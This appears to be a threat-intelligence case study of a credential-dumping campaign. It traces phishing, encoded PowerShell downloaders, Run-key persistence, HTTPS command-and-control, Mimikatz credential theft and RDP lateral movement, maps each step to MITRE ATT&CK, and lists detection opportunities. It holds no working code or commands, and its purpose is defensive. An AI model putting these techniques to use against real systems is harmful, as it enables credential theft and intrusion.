In-Depth Analysis of the Recent Malicious Credential Dumping Campaign: A Case Study

Nina Kovacs — Exploit Research Analyst

Key Takeaways

• Credential dumping via Mimikatz is frequently observed in targeted attacks leveraging T1003 techniques.
• Our investigation uncovered lateral movement patterns consistent with T1021.001 (Remote Services: RDP), indicating the actor’s focus on minimizing detection.
• Behavioral indicators show persistent C2 communication over encrypted channels, utilizing T1071.001 (Application Layer Protocol: Web Protocols).

Executive Summary

During our investigation of a recent malware campaign, we observed the preliminary stages of an attack that leveraged Mimikatz to extract sensitive credentials from compromised endpoints. Our analysis revealed that the actor employed a sophisticated multi-stage delivery method that included social engineering tactics to gain initial footholds and subsequently exfiltrate data silently. This case study aims to provide insights into the tactics employed, the implications of the discovered indicators, and recommendations for enhancing detection capabilities.

Initial Access

The attack commenced with a phishing email, which contained a malicious attachment masquerading as an important document. Upon execution, the dropper initiated a PowerShell command that retrieved additional payloads from a remote server. The sample we examined downloaded a second-stage payload using a PowerShell script with encoded Base64 content executed via powershell -EncodedCommand. This initial access method aligns with the T1566 (Phishing) technique, as it exploited human curiosity to achieve its goals.

Execution & Persistence

Once the secondary payload was executed, it established persistence on the compromised system using techniques outlined in T1547 (Startup Items). Specifically, the malware modified the registry key at HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, creating a new entry to ensure execution on user login. The persistence mechanism was designed to evade detection by being innocuous in appearance, relying on legitimate software paths to disguise its entry.

Command and Control

Our analysis of network traffic patterns revealed that the malware communicated with a command and control server over HTTPS. The actor utilized T1071.001 (Application Layer Protocol: Web Protocols) to obfuscate the C2 layer further. The C2 server hosted a dynamically generated domain, which showcased advanced evasion techniques, including IP rotation and domain fluxing, making it challenging to block malicious traffic effectively. During our investigation, we identified several command sequences used by the implant, suggesting a clear control mechanism for orchestrating further payload downloads and executing administrative tasks.

Lateral Movement & Discovery

Leveraging the credentials harvested from previous stages, the actor employed T1021.001 (Remote Services: RDP) to facilitate lateral movement across the network. The sample we analyzed demonstrated automated credential injection, using Mimikatz to extract credentials stored in memory and utilize them to access other machines within the organization. This behavior allowed the attacker to gather intelligence on internal resources, aiding in further network enumeration and establishing footholds in additional hosts.

Impact & Objectives

The overarching goal of this operation appeared to be the extraction of sensitive information, particularly focusing on customer data for potential resale on the dark web. After establishing persistence and performing lateral movement, we observed the deployment of a data exfiltration tool that operated within the context of scheduled tasks to siphon data periodically. The use/configuration of scheduled tasks reflects the actor’s priority to maintain a low profile while achieving their objectives.

MITRE ATT&CK Mapping

• T1003 – Credential Dumping: Utilizing various methods to extract stored credentials.
• T1566 – Phishing: Engaging targets through deceptive communications to gain initial access.
• T1071.001 – Application Layer Protocol: Web Protocols: Creating unsuspicious outbound connections to C2.
• T1021.001 – Remote Services: RDP: Facilitating lateral movement through network-based access.
• T1547 – Boot or Logon Autostart Execution: Establishing persistence through system modification on startup.

Detection Opportunities

• Monitor for unusual PowerShell command executions, especially those involving Base64-encoded scripts.
• Deploy alerts for modifications to the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run registry key to detect persistence mechanisms.
• Implement additional logging to capture RDP connection attempts, particularly those utilizing unexpected credentials or originating from unusual locations.

Analyst Notes

This case exemplifies how attackers capitalize on initial access methods rooted in social engineering, transitioning rapidly into credential harvesting and lateral movement techniques. Organizations are encouraged to enforce robust user training programs regarding phishing threats, establish stricter credential policies, and enhance monitoring for lateral movement behaviors. Given the evolving nature of these threats, a multi-layered security approach is critical for thwarting similar operations in the future.

Source: Original Report